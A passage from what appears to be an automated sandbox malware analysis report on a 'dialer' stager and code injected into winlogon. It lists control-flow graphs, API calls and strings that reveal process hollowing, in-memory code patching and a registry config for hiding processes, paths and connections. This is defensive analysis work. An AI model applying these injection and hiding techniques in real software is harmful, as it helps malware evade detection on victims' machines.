                                                    • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                    • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                    • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                  • ExitProcess.KERNEL32 ref: 0000000140002263
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                  • String ID:
                                                  • API String ID: 3836936051-0
                                                  • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                  • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                  • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                  • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                  • String ID: SOFTWARE$dialerstager$open
                                                  • API String ID: 3276259517-3931493855
                                                  • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                  • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                  • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                  • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                  • String ID: @
                                                  • API String ID: 3462610200-2766056989
                                                  • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                  • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                  • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                  • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID: dialersvc64
                                                  • API String ID: 4184240511-3881820561
                                                  • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                  • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                  • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                  • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\dialerconfig
                                                  • API String ID: 3013565938-461861421
                                                  • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                  • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                  • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                  • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: File$Write$CloseCreateHandle
                                                  • String ID: \\.\pipe\dialercontrol_redirect64
                                                  • API String ID: 148219782-3440882674
                                                  • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                  • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                  • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                  • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_46_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                  • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                  • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                  • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                  Execution Graph

                                                  Execution Coverage:1.7%
                                                  Dynamic/Decrypted Code Coverage:95.6%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:135
                                                  Total number of Limit Nodes:16
                                                  execution_graph 14971 1e8589b5cf0 14972 1e8589b5cfd 14971->14972 14973 1e8589b5d09 14972->14973 14980 1e8589b5e1a 14972->14980 14974 1e8589b5d3e 14973->14974 14975 1e8589b5d8d 14973->14975 14976 1e8589b5d66 SetThreadContext 14974->14976 14976->14975 14977 1e8589b5e41 VirtualProtect FlushInstructionCache 14977->14980 14978 1e8589b5efe 14979 1e8589b5f1e 14978->14979 14993 1e8589b43e0 14978->14993 14989 1e8589b4df0 GetCurrentProcess 14979->14989 14980->14977 14980->14978 14983 1e8589b5f23 14984 1e8589b5f37 ResumeThread 14983->14984 14985 1e8589b5f77 14983->14985 14986 1e8589b5f6b 14984->14986 14997 1e8589b7940 14985->14997 14986->14983 14988 1e8589b5fbf 14992 1e8589b4e0c 14989->14992 14990 1e8589b4e53 14990->14983 14991 1e8589b4e22 VirtualProtect FlushInstructionCache 14991->14992 14992->14990 14992->14991 14995 1e8589b43fc 14993->14995 14994 1e8589b445f 14994->14979 14995->14994 14996 1e8589b4412 VirtualFree 14995->14996 14996->14995 14998 1e8589b7949 14997->14998 14999 1e8589b7954 14998->14999 15000 1e8589b812c IsProcessorFeaturePresent 14998->15000 14999->14988 15001 1e8589b8144 15000->15001 15004 1e8589b8320 RtlCaptureContext 15001->15004 15003 1e8589b8157 15003->14988 15005 1e8589b833a RtlLookupFunctionEntry 15004->15005 15006 1e8589b8350 capture_current_context 15005->15006 15007 1e8589b8389 15005->15007 15006->15005 15006->15007 15007->15003 15008 1e8589b3ab9 15011 1e8589b3a06 15008->15011 15009 1e8589b3a70 15010 1e8589b3a56 VirtualQuery 15010->15009 15010->15011 15011->15009 15011->15010 15012 1e8589b3a8a VirtualAlloc 15011->15012 15012->15009 15013 1e8589b3abb GetLastError 15012->15013 15013->15009 15013->15011 15014 1e8589b28c8 15016 1e8589b290e 15014->15016 15015 1e8589b2970 15016->15015 15018 1e8589b3844 15016->15018 15019 1e8589b3851 StrCmpNIW 15018->15019 15020 1e8589b3866 15018->15020 15019->15020 15020->15016 15021 1e85898273c 15022 1e85898276a 15021->15022 15023 1e8589827c5 VirtualAlloc 15022->15023 15025 1e8589828d4 15022->15025 15023->15025 15026 1e8589827ec 15023->15026 15024 1e858982858 LoadLibraryA 15024->15026 15026->15024 15026->15025 15027 1e8589b554d 15029 1e8589b5554 15027->15029 15028 1e8589b55bb 15029->15028 15030 1e8589b5637 VirtualProtect 15029->15030 15031 1e8589b5663 GetLastError 15030->15031 15032 1e8589b5671 15030->15032 15031->15032 15033 1e8589b1abc 15039 1e8589b1628 GetProcessHeap 15033->15039 15035 1e8589b1ad2 Sleep SleepEx 15037 1e8589b1acb 15035->15037 15037->15035 15038 1e8589b1598 StrCmpIW StrCmpW 15037->15038 15084 1e8589b18b4 15037->15084 15038->15037 15040 1e8589b1648 __std_exception_copy 15039->15040 15101 1e8589b1268 GetProcessHeap 15040->15101 15042 1e8589b1650 15043 1e8589b1268 2 API calls 15042->15043 15044 1e8589b1661 15043->15044 15045 1e8589b1268 2 API calls 15044->15045 15046 1e8589b166a 15045->15046 15047 1e8589b1268 2 API calls 15046->15047 15048 1e8589b1673 15047->15048 15049 1e8589b168e RegOpenKeyExW 15048->15049 15050 1e8589b16c0 RegOpenKeyExW 15049->15050 15051 1e8589b18a6 15049->15051 15052 1e8589b16e9 15050->15052 15053 1e8589b16ff RegOpenKeyExW 15050->15053 15051->15037 15112 1e8589b12bc RegQueryInfoKeyW 15052->15112 15054 1e8589b1723 15053->15054 15055 1e8589b173a RegOpenKeyExW 15053->15055 15105 1e8589b104c RegQueryInfoKeyW 15054->15105 15059 1e8589b1775 RegOpenKeyExW 15055->15059 15060 1e8589b175e 15055->15060 15057 1e8589b16f5 RegCloseKey 15057->15053 15063 1e8589b17b0 RegOpenKeyExW 15059->15063 15064 1e8589b1799 15059->15064 15062 1e8589b12bc 11 API calls 15060->15062 15065 1e8589b176b RegCloseKey 15062->15065 15067 1e8589b17d4 15063->15067 15068 1e8589b17eb RegOpenKeyExW 15063->15068 15066 1e8589b12bc 11 API calls 15064->15066 15065->15059 15071 1e8589b17a6 RegCloseKey 15066->15071 15072 1e8589b12bc 11 API calls 15067->15072 15069 1e8589b1826 RegOpenKeyExW 15068->15069 15070 1e8589b180f 15068->15070 15075 1e8589b1861 RegOpenKeyExW 15069->15075 15076 1e8589b184a 15069->15076 15074 1e8589b104c 4 API calls 15070->15074 15071->15063 15073 1e8589b17e1 RegCloseKey 15072->15073 15073->15068 15077 1e8589b181c RegCloseKey 15074->15077 15079 1e8589b1885 15075->15079 15080 1e8589b189c RegCloseKey 15075->15080 15078 1e8589b104c 4 API calls 15076->15078 15077->15069 15081 1e8589b1857 RegCloseKey 15078->15081 15082 1e8589b104c 4 API calls 15079->15082 15080->15051 15081->15075 15083 1e8589b1892 RegCloseKey 15082->15083 15083->15080 15129 1e8589b14a4 15084->15129 15123 1e8589c6168 15101->15123 15103 1e8589b1283 GetProcessHeap 15104 1e8589b12ae __std_exception_copy 15103->15104 15104->15042 15106 1e8589b11b5 RegCloseKey 15105->15106 15107 1e8589b10bf 15105->15107 15106->15055 15107->15106 15108 1e8589b10cf RegEnumValueW 15107->15108 15111 1e8589b1125 __std_exception_copy __free_lconv_mon 15108->15111 15109 1e8589b114e GetProcessHeap 15109->15111 15110 1e8589b116e GetProcessHeap 15110->15111 15111->15106 15111->15108 15111->15109 15111->15110 15113 1e8589b1327 GetProcessHeap 15112->15113 15114 1e8589b148a __free_lconv_mon 15112->15114 15120 1e8589b133e __std_exception_copy __free_lconv_mon 15113->15120 15114->15057 15115 1e8589b1352 RegEnumValueW 15115->15120 15116 1e8589b1476 GetProcessHeap 15116->15114 15118 1e8589b13d3 GetProcessHeap 15118->15120 15119 1e8589b141e lstrlenW GetProcessHeap 15119->15120 15120->15115 15120->15116 15120->15118 15120->15119 15121 1e8589b13f3 GetProcessHeap 15120->15121 15122 1e8589b1443 StrCpyW 15120->15122 15124 1e8589b152c 15120->15124 15121->15120 15122->15120 15125 1e8589b157c 15124->15125 15128 1e8589b1546 15124->15128 15125->15120 15126 1e8589b1565 StrCmpW 15126->15128 15127 1e8589b155d StrCmpIW 15127->15128 15128->15125 15128->15126 15128->15127 15130 1e8589b14e1 GetProcessHeap 15129->15130 15131 1e8589b14c1 GetProcessHeap 15129->15131 15135 1e8589c6180 15130->15135 15133 1e8589b14da __free_lconv_mon 15131->15133 15133->15130 15133->15131 15136 1e8589c6182 15135->15136

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 106492572-2879589442
                                                  • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction ID: f0632be5b56d1d045c33e69aedb8194d200da67af966bba0f518d50e3ad8fab5
                                                  • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction Fuzzy Hash: 9171D636324A90CAEB11AF66E8907DDB7A4FF84B89F401126DE4E57B69EF39C444C740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction ID: 5c25a885d6fb7882426ca4c2d651152bb887428ee6332336122a0b4e2170aac2
                                                  • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction Fuzzy Hash: 51112A367287C1C6EB159B22E4043ADB7A0FB48B86F44003ADE8D07754EF2EC505C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 59 1e8589b5b30-1e8589b5b57 60 1e8589b5b6b-1e8589b5b76 GetCurrentThreadId 59->60 61 1e8589b5b59-1e8589b5b68 59->61 62 1e8589b5b82-1e8589b5b89 60->62 63 1e8589b5b78-1e8589b5b7d 60->63 61->60 64 1e8589b5b9b-1e8589b5baf 62->64 65 1e8589b5b8b-1e8589b5b96 call 1e8589b5960 62->65 66 1e8589b5faf-1e8589b5fc6 call 1e8589b7940 63->66 69 1e8589b5bbe-1e8589b5bc4 64->69 65->66 72 1e8589b5c95-1e8589b5cb6 69->72 73 1e8589b5bca-1e8589b5bd3 69->73 77 1e8589b5e1f-1e8589b5e30 call 1e8589b74bf 72->77 78 1e8589b5cbc-1e8589b5cdc GetThreadContext 72->78 75 1e8589b5bd5-1e8589b5c18 call 1e8589b85c0 73->75 76 1e8589b5c1a-1e8589b5c8d call 1e8589b4510 call 1e8589b44b0 call 1e8589b4470 73->76 88 1e8589b5c90 75->88 76->88 92 1e8589b5e35-1e8589b5e3b 77->92 81 1e8589b5ce2-1e8589b5d03 78->81 82 1e8589b5e1a 78->82 81->82 90 1e8589b5d09-1e8589b5d12 81->90 82->77 88->69 94 1e8589b5d92-1e8589b5da3 90->94 95 1e8589b5d14-1e8589b5d25 90->95 96 1e8589b5e41-1e8589b5e98 VirtualProtect FlushInstructionCache 92->96 97 1e8589b5efe-1e8589b5f0e 92->97 106 1e8589b5e15 94->106 107 1e8589b5da5-1e8589b5dc3 94->107 102 1e8589b5d27-1e8589b5d3c 95->102 103 1e8589b5d8d 95->103 104 1e8589b5e9a-1e8589b5ea4 96->104 105 1e8589b5ec9-1e8589b5ef9 call 1e8589b78ac 96->105 100 1e8589b5f10-1e8589b5f17 97->100 101 1e8589b5f1e-1e8589b5f2a call 1e8589b4df0 97->101 100->101 108 1e8589b5f19 call 1e8589b43e0 100->108 122 1e8589b5f2f-1e8589b5f35 101->122 102->103 109 1e8589b5d3e-1e8589b5d88 call 1e8589b3970 SetThreadContext 102->109 103->106 104->105 111 1e8589b5ea6-1e8589b5ec1 call 1e8589b4390 104->111 105->92 107->106 113 1e8589b5dc5-1e8589b5e0c call 1e8589b3900 107->113 108->101 109->103 111->105 113->106 124 1e8589b5e10 call 1e8589b74dd 113->124 125 1e8589b5f77-1e8589b5f95 122->125 126 1e8589b5f37-1e8589b5f75 ResumeThread call 1e8589b78ac 122->126 124->106 128 1e8589b5f97-1e8589b5fa6 125->128 129 1e8589b5fa9 125->129 126->122 128->129 129->66
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                  • Instruction ID: 5d1d641fdfe7a921bc40b2274792ee65e942fd43df3d51391b1333f61c708ac4
                                                  • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                  • Instruction Fuzzy Hash: 06D18976219B88C6DB709B46E49439EB7A1F7C8B85F100227EE8D47BA5DF38C551CB40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 131 1e8589b50d0-1e8589b50fc 132 1e8589b50fe-1e8589b5106 131->132 133 1e8589b510d-1e8589b5116 131->133 132->133 134 1e8589b5127-1e8589b5130 133->134 135 1e8589b5118-1e8589b5120 133->135 136 1e8589b5132-1e8589b513a 134->136 137 1e8589b5141-1e8589b514a 134->137 135->134 136->137 138 1e8589b5156-1e8589b5161 GetCurrentThreadId 137->138 139 1e8589b514c-1e8589b5151 137->139 141 1e8589b5163-1e8589b5168 138->141 142 1e8589b516d-1e8589b5174 138->142 140 1e8589b56d3-1e8589b56da 139->140 141->140 143 1e8589b5181-1e8589b518a 142->143 144 1e8589b5176-1e8589b517c 142->144 145 1e8589b5196-1e8589b51a2 143->145 146 1e8589b518c-1e8589b5191 143->146 144->140 147 1e8589b51a4-1e8589b51c9 145->147 148 1e8589b51ce-1e8589b5225 call 1e8589b56e0 * 2 145->148 146->140 147->140 153 1e8589b5227-1e8589b522e 148->153 154 1e8589b523a-1e8589b5243 148->154 157 1e8589b5230 153->157 158 1e8589b5236 153->158 155 1e8589b5255-1e8589b525e 154->155 156 1e8589b5245-1e8589b5252 154->156 161 1e8589b5273-1e8589b5298 call 1e8589b7870 155->161 162 1e8589b5260-1e8589b5270 155->162 156->155 159 1e8589b52b0-1e8589b52b6 157->159 160 1e8589b52a6-1e8589b52aa 158->160 164 1e8589b52e5-1e8589b52eb 159->164 165 1e8589b52b8-1e8589b52d4 call 1e8589b4390 159->165 160->159 171 1e8589b529e 161->171 172 1e8589b532d-1e8589b5342 call 1e8589b3cc0 161->172 162->161 166 1e8589b5315-1e8589b5328 164->166 167 1e8589b52ed-1e8589b530c call 1e8589b78ac 164->167 165->164 176 1e8589b52d6-1e8589b52de 165->176 166->140 167->166 171->160 178 1e8589b5351-1e8589b535a 172->178 179 1e8589b5344-1e8589b534c 172->179 176->164 180 1e8589b536c-1e8589b53ba call 1e8589b8c60 178->180 181 1e8589b535c-1e8589b5369 178->181 179->160 184 1e8589b53c2-1e8589b53ca 180->184 181->180 185 1e8589b53d0-1e8589b54bb call 1e8589b7440 184->185 186 1e8589b54d7-1e8589b54df 184->186 196 1e8589b54bf-1e8589b54ce call 1e8589b4060 185->196 197 1e8589b54bd 185->197 187 1e8589b5523-1e8589b552b 186->187 188 1e8589b54e1-1e8589b54f4 call 1e8589b4590 186->188 192 1e8589b5537-1e8589b5546 187->192 193 1e8589b552d-1e8589b5535 187->193 203 1e8589b54f6 188->203 204 1e8589b54f8-1e8589b5521 188->204 194 1e8589b5548 192->194 195 1e8589b554f 192->195 193->192 199 1e8589b5554-1e8589b5561 193->199 194->195 195->199 207 1e8589b54d2 196->207 208 1e8589b54d0 196->208 197->186 201 1e8589b5563 199->201 202 1e8589b5564-1e8589b55b9 call 1e8589b85c0 199->202 201->202 210 1e8589b55bb-1e8589b55c3 202->210 211 1e8589b55c8-1e8589b5661 call 1e8589b4510 call 1e8589b4470 VirtualProtect 202->211 203->187 204->186 207->184 208->186 216 1e8589b5663-1e8589b5668 GetLastError 211->216 217 1e8589b5671-1e8589b56d1 211->217 216->217 217->140
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                  • Instruction ID: 540203665ef2c2292df768c22022c8278d109779f1dd1d0b06d3c86d73575d79
                                                  • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
